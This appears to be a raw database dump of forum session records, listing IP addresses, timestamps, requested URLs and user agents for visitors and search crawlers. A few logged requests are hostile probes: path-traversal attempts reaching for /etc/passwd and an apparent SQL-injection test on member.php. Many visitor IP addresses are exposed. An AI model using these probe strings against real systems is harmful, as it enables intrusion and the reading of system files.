('259708c1737862cb46bd4b17b9e5ec59', 0, '43.228.156.55', 'b0a41fe58df32777797600f5eba4bc43', 1468749419, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('554f4250d4f0a5be7b4bab89103746b5', 0, '172.68.11.202', '7098bd0e28d4281c651272c4e1404a66', 1468321073, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d9ef49d838a9cbedc4c3326676f1956d', 0, '31.135.95.215', '21b97a52013b59e1312041781aa11a62', 1469085581, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('62ef8fa8e23e9b3ea87c1a8937d53e00', 0, '207.46.13.84', '5e207e311e22cdc3b2095126a922fa93', 1468327046, '/search.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5ac75b58d89f6a2443c855e518900f02', 0, '217.118.93.84', '1917703198c95dce16d0b688d14286ec', 1468328469, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 YaBr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e39ec183288a74c60d92bb8cc8e09d79', 0, '31.131.24.112', 'e245d71180e0f46e4ca15bb01f37ce0e', 1468332112, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1cfa95f03e625fedad88843dd78cd399', 0, '66.249.65.53', '1648f8a47a75cf068c093df360b6dc82', 1468338580, '/archive/index.php/t-2389.html', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('10e210173de079c057b220ae0c9e17d0', 0, '66.249.65.55', '1648f8a47a75cf068c093df360b6dc82', 1468338581, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ec331855da06a8ed7bf43666161f766b', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468345582, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('fa743d62248a236a0652718762711219', 0, '66.249.79.128', '42382f72607791905ff50694f07a1e96', 1470667465, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2d24308dbbfbc5d0e7b4b8ea64b105d3', 0, '66.249.79.241', '42382f72607791905ff50694f07a1e96', 1468404304, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ba2a1774a9bd5b45dd5650ce0f375d98', 0, '46.39.53.59', 'c4a594c456fa6b7032ef81d311e87aaa', 1468359838, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 YaBr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ca7c03f1d8ad2418fac4adf24e346741', 0, '66.249.79.136', '42382f72607791905ff50694f07a1e96', 1468412573, '/showthread.php?t=2505', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a8d683c6a776749a42c64c2887d08057', 0, '66.249.79.234', '42382f72607791905ff50694f07a1e96', 1468394658, '/showthread.php?t=2505', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bc9c2c203679301bc20ff1773d739073', 0, '66.249.79.128', '1f427e4d6723ae757ae768f9466ee93a', 1470627671, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1c095b3f5ae4985f751f33a6468d0e73', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468388734, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('bc0719cfd5a692d13fba0c8d10aa4d6e', 0, '66.249.79.227', '42382f72607791905ff50694f07a1e96', 1468394479, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('30fb0b747bd9f99461d55fbda0b04299', 0, '172.68.10.245', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1474727154, '/member.php?u=165', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9d888f989f29bf78799f8b36fc4f55ee', 0, '212.74.7.14', '43becb12da21f7927f8985f32bc0597a', 1468396199, '/showthread.php?t=2480', '', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('156d6f98a614521e110e79e219eb7400', 270, '109.232.255.173', '99cbbfdf8acc43919e765fa67faa13b3', 1468401138, '/faq.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('48ca8f410b45d9d92038bd5e2f690ade', 0, '66.249.79.248', '42382f72607791905ff50694f07a1e96', 1468419073, '/showthread.php?t=2505', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('767b41ed72946c97ca02344749ed9b20', 0, '180.67.186.124', 'd13de397e6625d8b1e47a5fe850dcf49', 1468556206, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7e122949a3cc2c01d6578ba86adba8c8', 0, '116.203.75.237', 'e4b2803d7c3f41a07712bf74d3f72212', 1468410546, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ce9a142217180c010fc5358a69be5194', 0, '31.24.221.3', '2776d90aeedfeac7da4fe94a658377e7', 1470315689, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bdd56e2eb6ef5b5e994dd1e629c2c252', 0, '172.68.34.92', '9d8a8ad3406087c14548478984f3ed76', 1468415675, '/faq.php', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('76fa1a4fbcd61d72c958671561700489', 0, '156.212.131.32', '4bc4387d9a7f931e0de0ddc9328b8ee7', 1468417590, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6342ce5244d67cac1a5bacbb545ce621', 0, '172.68.11.249', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475280809, '/showthread.php?p=2807', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f1f47cc17ea0ecdcd6e3b1d4a1466708', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468431943, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('a6dac65c4ef580101c9f33588fe7260a', 0, '207.46.13.31', '5e207e311e22cdc3b2095126a922fa93', 1468450313, '/faq.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('321159f1b88d4ed6f0b37f3423c3028f', 0, '157.55.39.145', '23f3103f44bc3badcba53554e5e4cb6d', 1468462054, '/forumdisplay.php?f=31', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5df932053c5f5ca5818ba81b3c35bf0b', 0, '2a02:598:a::79:', '4ca8e962c5d3bfd8b0694da9f6fc30f8', 1471768450, '/search.php?do=getnew', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6ab80ceb465e20bb2ea99091f65d28ee', 0, '172.68.10.198', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1471332500, '/showthread.php?mode=hybrid&t=2347', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('496733d5d9936951912d6a2a5210e0e2', 0, '172.68.10.239', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1468472258, '/member.php?u=185', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7043522f504731c0c1a0a33bf35f2114', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468474977, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('4d328db8b19182604af849ee4282f7cc', 0, '172.68.29.136', '326cb88ed217829755bca436a922750e', 1468477260, '/member.php?u=13\'A=0', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ae226c3bde1b7deb9ac639964abcb60c', 0, '188.227.173.194', '653f2f7c50b58a7d1fe3af72829f1abb', 1468493352, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ea0f11ea575a5fee309aa046ce88fce5', 161, '54.233.145.152', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1468493822, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('8d3bf697329dd94b4538848e4ad50fd4', 0, '86.186.75.99', '12231f3156920342c1bcfebdf3dfb4f5', 1468500899, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('79150b6e2e61370f54fe6abd2f91f08e', 0, '172.68.10.252', '4c1d996b4a00ed40eda69a011549255d', 1468512394, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a870aa1f84686c902dcc36a37720d2e0', 0, '197.116.232.248', '86476c13bc2a3ad2a62495f95a9bffaf', 1468512191, '/index.php', 'Mozilla/5.0 (Linux; Android 4.4.2; SUNSET2 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chro', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('09034b08589146f64654b825588d031d', 0, '1.55.196.122', '247bff69c569790fccd5c091dbc31617', 1468516592, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bad19286fead85db0fa0fc987119504d', 0, '169.57.0.225', '2f2731d7671c561626d3400c6053dea2', 1468517791, '/search.php?do=getdaily', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f7597630a5a15b804d75e10bba05b4e4', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468518012, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('32cde79e01737b5da0955ab90b7f82d7', 0, '172.68.29.121', '331f628919e1f27a53ce10a9f48575c1', 1468518818, '/index.php', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('86d788f1671fa55ce5c9e1b0a0a3edee', 0, '2a02:1812:1124:', 'efb7de77cb0b63dc90016bdba196216c', 1468518945, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('13cfbda45e560519b656abfe8ff7e666', 0, '159.203.209.25', '62e18d6351403ceec0622533999d59f9', 1468529255, '/showthread.php?p=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0b1098867f0035ef29995a095a62bdc5', 0, '46.101.213.137', 'd4c72cf6e439c8b0172273ac78fab0d3', 1468537171, '/showthread.php?t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2fd03e264c7921839f3fcc1e54fd40ec', 0, '157.55.39.181', '23f3103f44bc3badcba53554e5e4cb6d', 1468537244, '/showthread.php?p=2697', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cb86ed79cb22132be905c43440070d1d', 0, '172.68.10.239', 'e6f96ccdbc10d74f62f5e55f33bfb21f', 1468545382, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('107fc39578848b4dd7b44c03b3abdeb1', 0, '128.68.220.34', '32b4e46c8b927c6a8251f09d3df0abcd', 1468545382, '/faq.php', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d5df33ab3427320ea97d38cfb5b4828a', 0, '108.3.147.208', 'ac859e850c4d1a4e49cc6bf07ce07c86', 1468547457, '/showthread.php?p=2688', 'iCoreService (unknown version) CFNetwork/760.4.2 Darwin/15.4.0 (x86_64)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a01e8d5944592f17b40866c162ac85bb', 0, '79.119.116.36', '3f516e12715efee032f7488a4d0f7067', 1468552461, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('335dc9798fc138212f6a57fbc229213a', 0, '172.68.11.237', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1470845564, '/member.php?u=272', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0e318ec3657898379c4ff272f8c8f151', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468560886, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('b918825a1f893cba8de9fd9ad89feff9', 0, '2602:30a:c07a:e', 'cdfc50b317914bd5f46670eef816955a', 1468573876, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('85c92b943699f89a91f75ff8aac576ec', 0, '82.26.149.19', 'b22f9bff4cb640fc965b5b1c0d87b0be', 1468592124, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6b908c850f96839c4daf10382578e2e3', 0, '46.19.141.158', '5283a9447ea0f856d3ecfe732501af05', 1468595268, '/register.php', 'Mozilla/5.0 (Windows NT 6.3; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a3ab72ecaaf8c43cfa12afc5f95d7fbf', 0, '195.154.173.103', '7bf60cfcb11216cb1106645b0b9bbf11', 1468597336, '/login.php?do=lostpw', 'Mozilla/5.0 (X11; CrOS x86_64 6310.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.96', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f741e910f70d228d10544569a6513f0a', 0, '85.105.178.242', '22076fb860141fa056cc3c6dec8c03c5', 1468600548, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('64a54f8cf72f694250169b4caa293d05', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468603867, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('d34126fd668f965c5707b3d31afd8176', 0, '213.169.83.105', '3b51ac9ef6a4c03cc8b9bf78bcda0615', 1468609628, '/login.php?do=login&do=login', 'Mozilla/5.0 (X11; CrOS x86_64 6310.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.96', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2a18cdb9ac58a5d5eb9c0c8d2c089012', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468647205, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('e1d775fb4f4c2e543b50211eec873985', 0, '139.162.183.243', '3e716f158bde1be38a8933884e394125', 1468656867, '/index.php', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2b8eba8718d88044796fa81fa9dc3a0e', 0, '178.233.217.16', 'fd2eb55b569d5f9902475f42fcc48459', 1468663289, '/search.php?do=getdaily', 'Mozilla/5.0 (Linux; Android 4.4.2; ASUS_T00J Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Ch', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e1515126d39dda3cd51e08bc766e8823', 0, '178.79.40.72', 'ca33ebf43266beaf813750c72b755e9c', 1468675673, '/showthread.php?p=2928', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.10', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e82ebbe50a4cd4a8025adfa7940ec8bc', 0, '103.49.121.19', '9e7f1b5b3601b418bf03a437ed29d157', 1468676031, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3becf7ca47af6ca35685a3c6d847ded8', 0, '116.108.207.13', 'a4739c9dcaf9a51eeb56ab65185e4d41', 1468682716, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1e71afa998a6df6c7b68f5f084d622bd', 0, '172.68.34.83', '48e6d024059fb2a9da075a7ca7075ff4', 1468685032, '/showthread.php?p=3045', 'Google-HTTP-Java-Client/1.17.0-rc (gzip)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e6cfbca82445da3cfc3459d60a94f75d', 0, '23.22.196.139', 'cb57015f4f4d3428cf6ed3ffcd0c1dca', 1468685032, '/showthread.php?p=3045', 'help@dataminr.com', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6ce7b9199534ad25c21579b3b207bba0', 0, '17.142.155.111', '024c18e9e9e6351b1f7a9ec4c1a3cb62', 1468685971, '/showthread.php?p=3045', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3768a3a6dd9fd6f2f9e6b1d939d2d792', 0, '52.21.137.163', '3acd0f69c57326d59dfb071bd1f605d3', 1468685034, '/showthread.php?p=3045#post3045', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8b58d3ecba0939f1075f5f0068ea2426', 0, '52.5.121.103', 'e44d77504e7d09b9ce231633f48eeaf9', 1468685043, '/showthread.php?p=3045', 'Go-http-client/1.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('816dd375fd4f9c5af24ae3d2d18d3e30', 0, '2607:5300:60:80', 'e50ae2117304bf42d5bc9da441088032', 1468685050, '/showthread.php?p=3045', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0017b5dddd01f3a02cd81d36d7cd75a3', 0, '77.154.204.170', 'ee775d856c8a7dfe61c5f15382573a71', 1468685063, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('07df883244e361706c8369bc9386ecc4', 0, '74.6.254.87', '800dc6c30a1c0ad24f7bfaa546037bd8', 1468690053, '/showthread.php?p=3045', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('009d06bd7912635343f4717aca0fd3d7', 0, '54.87.115.37', '8494dcd13a606823a6b3a293dd39980f', 1468685556, '/showthread.php?p=3045', 'RebelMouse/0.1 Mozilla/5.0 (compatible; http://rebelmouse.com) Gecko/20100101 Firefox/7.0.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4ccce5679876d5ca06103a7d5812b22c', 0, '17.142.156.161', 'aa6daa7ef38cde49dfdfb57be9faf5e0', 1468685972, '/showthread.php?p=3045', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('15a54af3424126bed5d5ca6dd3f5d5fb', 0, '79.152.185.229', 'e075fb6c4e1e2689fa9781c5f1deda7a', 1468686335, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mob', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5ca09d3a0e01f8a3c85f900fb4960cb2', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468690475, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('ff4d752932da10b58b5857d5e0ce4570', 0, '85.232.135.48', 'd7b5e79414405168d95602cbef8e2e6b', 1468691105, '/showthread.php?p=3045', 'Mozilla/5.0 (Linux; Android 6.0.1; LG-H850 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chro', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('188704e266a282a469a5ff048e07ab02', 0, '172.68.34.51', 'a938925ca9403f145c82d10ebc1ecbe1', 1470298061, '/member.php?u=279', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9341f6586104ab5c7fd428b51669ade3', 0, '187.158.243.133', 'f241b328d69fd52c2d8cc3bd91572358', 1468719113, '/index.php', 'Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('20c684f737415eb7edd9e8eb6afedae6', 0, '2605:e000:141b:', '121af1d85c5c80572c25d13103735987', 1470109984, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4b561a113a01775eba6c9b3ed63c9186', 0, '50.88.84.163', '7a9ad1f46d83483ff312fbe3f2059e30', 1468725309, '/memberlist.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2888f574a7ea10bd3287444e8054f0d3', 0, '2600:1008:b160:', '612d7fc49083e7b539c70c9e220b0c0c', 1468727674, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6d203fa302dc5348e0fdfd354a88e565', 0, '40.77.167.18', 'c5490a5a8e1813ac25cf9e19091dcb85', 1468730482, '/archive/index.php/f-32.html', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('a4e3dc2002cd62c9bd73f90b709fedb6', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468733143, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('abd2bc6221d395ef91cedeb2197bfcdc', 0, '148.251.246.203', 'b8b3780671ba81454d8c4107777ba82c', 1468735100, '/showthread.php?p=3045', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('45f6ef0b21ab41b88f2be5ecdadd23e3', 0, '195.154.172.59', '7e189de7f4ea51cbaf2c3988c3d03978', 1468751222, '/showthread.php?p=3045', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('053830c68e176e293546b4a164932ee4', 0, '178.161.124.113', 'e3f21924bacbbb7924df8a8634250213', 1468760632, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 YaBr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3b252bbe596f93f0022483a1dccb9d2a', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468776123, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('740fd251859f31aee90926c73e60a094', 0, '164.132.161.59', 'f069ebb6a315f0439dd2baf44ddfa550', 1474193941, '/showthread.php?p=2697', 'Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
